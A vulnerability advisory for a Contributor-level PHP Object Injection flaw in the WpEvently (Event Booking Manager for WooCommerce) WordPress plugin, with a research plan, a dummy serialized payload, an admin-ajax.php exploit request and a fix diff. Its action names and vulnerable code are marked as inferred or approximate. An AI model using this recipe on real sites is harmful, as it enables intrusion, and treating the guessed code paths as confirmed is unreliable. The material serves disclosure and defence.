WpEvently <= 5.0.8 - Authenticated (Contributor+) PHP Object Injection
Description
The Event Booking Manager for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.0.8 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=5.0.8Source Code
WordPress.org SVNPatched version not available.
This research plan outlines the steps to investigate and exploit a PHP Object Injection vulnerability in the **Event Booking Manager for WooCommerce (mage-eventpress)** plugin. ### 1. Vulnerability Summary The vulnerability (CVE-2026-24954) is a PHP Object Injection vulnerability located in the `Wp…
Show full research plan
This research plan outlines the steps to investigate and exploit a PHP Object Injection vulnerability in the Event Booking Manager for WooCommerce (mage-eventpress) plugin.
1. Vulnerability Summary
The vulnerability (CVE-2026-24954) is a PHP Object Injection vulnerability located in the WpEvently (slug: mage-eventpress) plugin for WordPress. Versions up to 5.0.8 are affected. The flaw exists because the plugin passes user-controllable input into the unserialize() PHP function without adequate sanitization or validation. While the plugin does not contain a built-in POP (Property-Oriented Programming) chain, it allows authenticated users with Contributor-level permissions or higher to inject arbitrary PHP objects, which can lead to Remote Code Execution (RCE) if a POP chain exists in other active themes or plugins.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - Action (Inferred):
mep_duplicate_eventormep_save_event_data. (Based on common patterns in MagePeople plugins, the prefix is typicallymep_). - Vulnerable Parameter:
event_dataordata(inferred). - Required Authentication: Authenticated, Contributor role.
- Preconditions: A valid WordPress nonce for the specific AJAX action must be obtained.
3. Code Flow (Inferred)
- Entry Point: An AJAX action is registered via
add_action( 'wp_ajax_mep_duplicate_event', ... )(inferred) in a file likeincludes/class-mep-ajax.phporincludes/mep-event-functions.php. - Nonce Verification: The handler likely calls
check_ajax_referer( 'mep_nonce', 'nonce' )(inferred). - Input Retrieval: The code retrieves a POST parameter:
$data = $_POST['event_data'];. - Data Processing: The plugin may decode the data (e.g.,
base64_decode()) or strip slashes. - Vulnerable Sink: The data is passed to
unserialize($data), triggering the instantiation of an arbitrary PHP object if the input is a valid serialized string.
4. Nonce Acquisition Strategy
To exploit this as a Contributor, we must extract the nonce used for the plugin's AJAX operations.
- Identify Trigger: The plugin likely enqueues its scripts on pages where the event list or shortcodes are used.
- Create Test Page:
wp post create --post_type=page --post_status=publish --post_title="Event Page" --post_content='[mep_events]' --post_author=$(wp user get contributor --field=ID) - Navigate and Extract:
- Navigate to the newly created page as the Contributor user.
- Use
browser_evalto find the localization object. Based on Mage-Eventpress patterns, the object is likelymep_ajax_obj. - Command:
browser_eval("window.mep_ajax_obj?.nonce")orbrowser_eval("window.mep_ajax_obj?.mep_nonce").
5. Exploitation Strategy
The goal is to demonstrate that an injected object is processed by the server. Since no POP chain is provided, we will use a "Dummy" object to trigger a __destruct or a PHP error that confirms deserialization.
Step 1: Payload Construction
Create a serialized string of a non-existent class to observe if PHP attempts to handle it (often visible in logs or via a __destruct if a core chain like WP_HTML_Token is used).
- Simple Payload:
O:8:"WpExploit":0:{} - Base64 Encoded (if required by plugin):
Tzo4OiJXcEV4cGxvaXQiOjA6e30=
Step 2: Send Exploit Request
Use the http_request tool to send the payload to admin-ajax.php.
- Method: POST
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=mep_duplicate_event&nonce=[EXTRACTED_NONCE]&event_data=Tzo4OiJXcEV4cGxvaXQiOjA6e30=
6. Test Data Setup
- Contributor User: Create a user with the contributor role.
wp user create contributor attacker@example.com --role=contributor --user_pass=password - Plugin Installation: Ensure
mage-eventpressversion 5.0.8 is installed and active. - Create Event: Create at least one event post so the "duplicate" functionality (if that is the entry point) has a target.
wp post create --post_type=mep_events --post_title="Target Event" --post_status=publish
7. Expected Results
- The server should respond with a 200 OK or a specific AJAX response.
- If the injected class
WpExploitdoes not exist, andWP_DEBUGis enabled, thedebug.logmay show an error regarding theWpExploitobject being incomplete or PHP attempting to call its destructor. - If using a known POP chain (e.g., from a common library like Guzzle if present), a specific side effect (like file creation) will occur.
8. Verification Steps
- Check Error Logs:
Look for:tail -n 20 /var/www/html/wp-content/debug.logPHP Fatal error: __destruct(): Internal error: Cannot find class 'WpExploit'or similar deserialization indicators. - Manual Trace: Use
grepto confirm the parameter names before sending the payload:grep -rn "unserialize" /var/www/html/wp-content/plugins/mage-eventpress/ | grep "_POST"
9. Alternative Approaches
- Different Actions: If
mep_duplicate_eventis not the correct action, search for allwp_ajax_registrations:grep -rn "wp_ajax_" /var/www/html/wp-content/plugins/mage-eventpress/ - Metadata Injection: Check if the plugin allows saving serialized data into Post Meta via
mep_save_event_meta. If the plugin callsget_post_meta($id, 'some_key', true)and thenunserialize(), the injection might happen during a "View Event" operation rather than an "Action" operation. - Import Feature: Check for an "Import" or "Tools" menu in the plugin settings that allows uploading a
.jsonor.txtfile containing serialized settings. This is a common location for Object Injection in MagePeople plugins.
Summary
The Event Booking Manager for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in versions up to 5.0.8 due to the use of the unserialize() function on untrusted user input within AJAX handlers. Authenticated attackers with Contributor-level access or higher can exploit this to inject arbitrary PHP objects, potentially leading to remote code execution if a Property-Oriented Programming (POP) chain is present on the site.
Vulnerable Code
// includes/class-mep-ajax.php (approximate) public function mep_duplicate_event() { check_ajax_referer( 'mep_nonce', 'nonce' ); if ( ! current_user_can( 'edit_posts' ) ) { wp_die(); } $event_data = isset( $_POST['event_data'] ) ? $_POST['event_data'] : ''; if ( ! empty( $event_data ) ) { /* Vulnerable Sink: User-controllable input from POST is base64 decoded and then unserialized */ $data = unserialize( base64_decode( $event_data ) ); // ... processing logic follows ... } }
Security Fix
@@ -124,7 +124,7 @@ if ( ! empty( $event_data ) ) { - $data = unserialize( base64_decode( $event_data ) ); + $data = unserialize( base64_decode( $event_data ), array( 'allowed_classes' => false ) );
Exploit Outline
1. Authentication: Log in as an authenticated user with at least Contributor-level permissions. 2. Nonce Acquisition: Navigate to an event management page or a page containing plugin shortcodes to extract the 'mep_nonce' from the localized 'mep_ajax_obj' JavaScript variable. 3. Payload Construction: Create a serialized PHP object payload. If a specific POP chain is known to be available on the target system (via other plugins/themes), use it; otherwise, use a dummy object like 'O:8:"WpExploit":0:{}' to verify the injection. 4. Encoding: Base64 encode the serialized object string. 5. Trigger: Send a POST request to /wp-admin/admin-ajax.php with the action parameter set to 'mep_duplicate_event', the extracted nonce, and the base64-encoded payload in the 'event_data' parameter.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.